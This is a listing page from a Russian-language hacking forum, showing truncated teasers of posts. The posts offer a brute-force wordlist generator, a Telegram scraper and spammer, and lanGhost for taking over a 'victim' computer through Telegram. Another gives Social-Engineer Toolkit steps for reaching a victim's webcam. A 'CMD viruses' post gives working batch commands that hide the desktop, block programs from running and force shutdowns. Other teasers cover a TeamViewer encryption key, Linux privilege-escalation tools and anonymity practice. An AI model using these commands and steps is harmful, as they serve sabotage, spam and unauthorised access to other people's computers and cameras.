Интересно  Создаем хороший словарь для BruteForce
Я решила сделать краткую статьи без процессов установки и тому подобному а сразу перейти к сути.А если кто то не понял как проходит обычный процесс установки либо является новичком просьба обратиться ко мне на форуме в лс либо же ответить в теме,также готова ответить в ТГ @nMas0i Скрипт предназначен для генерации словарей для брутфорса. Собственно и сам софт: Давайте теперь введём...
Интересно  TeleGram-Scraper: Парсер/Инвайтер/Спаммер
Для установки скрипта, пишем эти команды: $ pkg install -y git python $ git clone https://github.com/th3unkn0n/TeleGram-Scraper.git $ cd TeleGram-Scraper Переход по адресу my.telegram.org и авторизируемся основным аккаунтом Выбираем APO Development tools пишем название В командной строке пишем python setup.py -c Вводим api_id а также api_hash а также номер телефона Пишем python...
Dangerzone: Песочница для "подозрительных" документов
Скрипт DangerZone может перевести типы документов приведённых ниже в безопасные PDF файлы PDF ( .pdf) Microsoft Word ( .docx, .doc) Microsoft Excel ( .xlsx, .xls) Microsoft PowerPoint ( .pptx, .ppt) ODF Text ( .odt) ODF Spreadsheet ( .ods) Презентация ODF ( .odp) ODF Графика ( .odg) JPEG ( .jpg, .jpeg) GIF ( .gif) PNG ( .png) TIFF ( .tif, .tiff) УСТАНОВКА Скачать 0.1 для Mac Скачать 0.1...
Интересно  lanGhost: взлом компьютера через телеграмм
Что нам потребуется ОС Kali Python3 Доступ к сети жертвы lanGHOST Телеграмм Установка lanGHOST Устанавливает Python sudo apt install python3 python3-pip Cкачиваем IanGHOST c github`а git clone https://github.com/xdavidhu/lanGhost Переходим в директорю cd lanGhost Запускаем sudo ./setup.py Шаг 1 setup.py: Вводим имя сети жертвы Шаг 2 setup.py: Надо создать API ключ.Пишем боту...
Интересно  "Вирусы" в CMD
Ломаем РБ @Echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul Выключение @Echo off shutdown /p Перезагрузка @Echo off shutdown /r /t 1 Убираем возможность запуска программ @Echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe...
Интересно  Доступ к веб-камере при помощи Kali linux и CИ
Сегодня дл получения доступа к веб камере жертвы мы будем использовать Kali Linux и СИ Установка 1) Открываем терминал 2) Прописываем Setoolkit Долно получиться Выбираем в списке Social Engineering Attacks. 3) То есть прописываем один(1) Должно появиться следущее: Выбираем Powershell Attack Vectors. 4) Пишем 9 Тут же нам надо - Powershell Alphanumeric Shell...
Интересно  Ненадёжность хранения паролей TeamViewer
Cегодня речь пойдёт о программе TeamViewer(В дальнейшем: TV) как вы уже могли понять из названия) Популярная программа и встаёт вопрос о безопасности.Дальше мы расмотрим то как храняться пароли в программе УДАЛЁННОГО ДОСТУПА.) Для шифрования используется алгроритм AES-128-CBC и спец.ключ - 0602000000a400005253413100040000 Один из начинающих специалист по ИБ рассказывал что наткнулся на...
Интересно  Повышаем привилегии в Linux: TOP утилит
Повышение привилегий в Linux Эскалация— Это сложное слово означает повышение привилегий,используя уязвимости в ОС или ПО,позволяет получить доступ к ресурсам которые обычного защищены. PXEnum Функция перечисления - является основной задачей данного скрипта.Скрипт отыскивает всю доступную информацию о система.Команды скрипта позволяют быстро находить хеши паролей,содержания...
Интересно  Правила проведение анонимных сеансов
В данной статье речь пойдёт о том как правильно вести себя во время анонимных сеансов. В качестве анонимной системы в статье будем представлена TAILS Также хотелось бы отметить ,то что TAILS всего лишь инструмент и не предоставляет вам 100% анонимность,если вы не будите правильно ей пользоваться.Лучшая защитой может послужить чувство осторожности и правильное мышление,всё остальное является...
Интересно  Китайская хакерская группировка APT12
Для кибершпионажа в поднебесной,помимо постоянных структур таких подразделений НОАК и госбезопасности,также крупные хакеры для самой грязной работы используют вольнонаемных команд хакеров.Так как в случае того что общественность у узнать о их не совсем хороших планах,репутационный ущерб правительству был не столь значимым. APT12 Предположительно APT12 (aka IXESHE, aka DynCalc, aka Calc Team...

Статистика форума

Темы
22 143
Сообщения
61 058
Пользователи
13 297
Новый пользователь
Burbongk

Пользователи онлайн

Всего посетителей:
677
Пользователи онлайн:
1
Гости онлайн:
676